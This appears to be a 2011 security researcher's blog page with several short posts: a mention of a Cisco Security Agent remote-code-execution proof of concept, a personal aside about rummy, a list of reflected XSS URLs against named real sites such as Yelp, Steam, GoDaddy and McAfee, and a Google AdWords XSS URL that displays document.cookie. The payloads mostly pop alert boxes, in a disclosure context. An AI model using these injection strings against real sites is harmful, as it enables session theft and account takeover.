Here is my proof-of-concept exploit for the Cisco Security Agent Management st_upload Remote Code Execution Vulnerability (ZDI-11-088) I reported to ZDI a little while back.
CVE ID: CVE-2011-0364
0 comments
March 7th, 2011
| Tags:
My wife and I are playing a “never ending” game of rummy and being the geek I am, I decided to keep track of our game play so we can chart our progress. Needless to say my wife is kicking my ass and now its public for all to see. Luckily, I have time for an amazing comeback that will also be completely documented.
I have a bad habit of saving these little random bugs and telling myself that I ‘may have a need for them later’. I think thats just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given the fact I just cleaned out all my old parts, I figured I need to do the same for these so here are some random XSS bugs I’ve found. As of now (Tue Jan 4 21:07:03 EST 2011) all are unpatched except for the mint.com one (on a side note, their group of guys seems great!)
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//
I’ve been cleaning old code again and I think it’s been long enough that I can release this now. I used it to extract code that was embedded within the Cisco Security Agent Management Console (CSAMC). Hopefully someone will find it useful.
January 4th, 2011
| Tags: xss
Not sure when this got reported or fixed, but I guess I missed the reward by a day.
https://adwords.google.com/cm/CampaignMgmt?__u=1111111111&__c=1111111111&stylePrefOverride=2',0);alert(document.cookie)//